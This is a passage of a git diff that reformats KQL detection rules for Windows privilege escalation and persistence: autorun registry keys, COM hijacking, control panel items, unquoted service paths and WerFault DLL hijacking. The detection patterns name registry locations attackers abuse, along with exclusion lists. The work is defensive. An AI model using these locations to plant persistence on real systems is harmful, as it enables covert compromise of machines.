-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey endswith "\\lnkfile\\shellex\\ContextMenuHandlers*")))) and (not(RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql index 1cebb162..28e2f9a0 100644 --- a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql +++ b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql @@ -1,12 +1,12 @@ -// Title: COM Hijacking via TreatAs -// Author: frack113 -// Date: 2022-08-28 -// Level: medium -// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 -// False Positives: -// - Legitimate use - -DeviceRegistryEvents +// Title: COM Hijacking via TreatAs +// Author: frack113 +// Date: 2022-08-28 +// Level: medium +// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use + +DeviceRegistryEvents | where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql index 24b51adb..17ddb5f8 100644 --- a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql +++ b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql @@ -1,12 +1,12 @@ -// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-16 -// Level: high -// Description: Detects potential COM object hijacking via modification of default system CLSID. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-16 +// Level: high +// Description: Detects potential COM object hijacking via modification of default system CLSID. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where ((RegistryKey endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*" or RegistryKey endswith "\\{2155fee3-2419-4373-b102-6843707eb41f}*" or RegistryKey endswith "\\{4590f811-1d3a-11d0-891f-00aa004b2e24}*" or RegistryKey endswith "\\{4de225bf-cf59-4cfc-85f7-68b90f185355}*" or RegistryKey endswith "\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}*" or RegistryKey endswith "\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}*" or RegistryKey endswith "\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}*" or RegistryKey endswith "\\{7849596a-48ea-486e-8937-a2a3009f31a9}*" or RegistryKey endswith "\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}*" or RegistryKey endswith "\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}*" or RegistryKey endswith "\\{30D49246-D217-465F-B00B-AC9DDD652EB7}*" or RegistryKey endswith "\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}*" or RegistryKey endswith "\\{2227A280-3AEA-1069-A2DE-08002B30309D}*" or RegistryKey endswith "\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}*" or RegistryKey endswith "\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}*") and (RegistryKey endswith "\\CLSID*" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)"))) and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Temporary Internet" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql index 39c14ca1..e5da89bd 100644 --- a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Common Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Common Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler*" or RegistryKey endswith "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler*") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/control_panel_items.kql b/KQL/rules/Privilege Escalation/control_panel_items.kql index 73d6ffb7..74887005 100644 --- a/KQL/rules/Privilege Escalation/control_panel_items.kql +++ b/KQL/rules/Privilege Escalation/control_panel_items.kql @@ -1,10 +1,10 @@ -// Title: Control Panel Items -// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) -// Date: 2020-06-22 -// Level: high -// Description: Detects the malicious use of a control panel item -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546 - -DeviceProcessEvents +// Title: Control Panel Items +// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) +// Date: 2020-06-22 +// Level: high +// Description: Detects the malicious use of a control panel item +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546 + +DeviceProcessEvents | where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql index de77d3a8..49be841b 100644 --- a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql +++ b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql @@ -1,10 +1,10 @@ -// Title: Created Files by Microsoft Sync Center -// Author: elhoim -// Date: 2022-04-28 -// Level: medium -// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion - -DeviceFileEvents +// Title: Created Files by Microsoft Sync Center +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql index 748895b6..a4d787f2 100644 --- a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql +++ b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql @@ -1,11 +1,11 @@ -// Title: Creation Exe for Service with Unquoted Path -// Author: frack113 -// Date: 2021-12-30 -// Level: high -// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. -// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 - -DeviceFileEvents +// Title: Creation Exe for Service with Unquoted Path +// Author: frack113 +// Date: 2021-12-30 +// Level: high +// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. +// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 + +DeviceFileEvents | where FolderPath =~ "C:\\program.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql index 6d865550..3bec8773 100644 --- a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql +++ b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql @@ -1,10 +1,10 @@ -// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder -// Author: frack113 -// Date: 2022-05-09 -// Level: medium -// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 - -DeviceFileEvents +// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder +// Author: frack113 +// Date: 2022-05-09 +// Level: medium +// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceFileEvents | where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql index 421bf996..1612837c 100644 --- a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: CurrentControlSet Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: CurrentControlSet Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql index 78b4aadd..2fe90fd6 100644 --- a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: CurrentVersion Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not(((RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey endswith "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}*")) or isnull(RegistryValueData) or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")))) and (not(((RegistryValueData =~ "Binary Data" and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run*") or ((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}", "{472083B1-C522-11CF-8763-00608CC02F24}")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or ((RegistryValueData in~ ("\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData endswith "\\Discord\\Update.exe --processStart Discord.exe" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData in~ ("C:\\Program Files\\Opera\\launcher.exe", "C:\\Program Files (x86)\\Opera\\launcher.exe")) and RegistryKey endswith 